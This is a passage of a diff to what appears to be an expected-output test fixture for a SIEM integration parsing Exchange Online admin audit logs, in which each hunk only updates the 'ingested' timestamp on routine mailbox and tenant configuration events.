Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -5701,7 +5701,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853344300Z", + "ingested": "2021-12-14T14:49:28.056983340Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"2cb36c1c-1368-4483-9801-08d7adfc11fe\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance15\",\"Operation\":\"Set-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"PrivacyStatementURL\",\"Value\":\"http://go.microsoft.com/fwlink/?LinkID=259417\"},{\"Name\":\"PrivacyLinkDisplayEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -5771,7 +5771,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853350400Z", + "ingested": "2021-12-14T14:49:28.056983956Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -5839,7 +5839,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853356100Z", + "ingested": "2021-12-14T14:49:28.056984489Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"a9fb5fce-4ce4-43eb-f429-08d7adfc122c\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -5909,7 +5909,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853361900Z", + "ingested": "2021-12-14T14:49:28.056985051Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"5f84ceaa-e6df-4ba1-1085-08d7ac0f4646\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -5977,7 +5977,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853367600Z", + "ingested": "2021-12-14T14:49:28.056985519Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -6047,7 +6047,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853373300Z", + "ingested": "2021-12-14T14:49:28.056986007Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -6128,7 +6128,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853379Z", + "ingested": "2021-12-14T14:49:28.056986559Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"7386959b-a0d0-459e-baf8-08d7adfc0b4b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -6209,7 +6209,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853384900Z", + "ingested": "2021-12-14T14:49:28.056987050Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -6290,7 +6290,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853390700Z", + "ingested": "2021-12-14T14:49:28.056987608Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"96b98335-ab19-4e22-31e0-08d7ac0f2ac2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -6371,7 +6371,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853396500Z", + "ingested": "2021-12-14T14:49:28.056988113Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -6452,7 +6452,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853402300Z", + "ingested": "2021-12-14T14:49:28.056988550Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:04\",\"ExternalAccess\":true,\"Id\":\"5cd5fc38-5b48-47d6-2e47-08d7ac0f2b01\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -6533,7 +6533,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853408Z", + "ingested": "2021-12-14T14:49:28.056989011Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"ff48ffeb-5c2a-468f-9113-08d7ac0f3512\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -6614,7 +6614,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853413700Z", + "ingested": "2021-12-14T14:49:28.056989492Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -6695,7 +6695,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853420Z", + "ingested": "2021-12-14T14:49:28.056989989Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 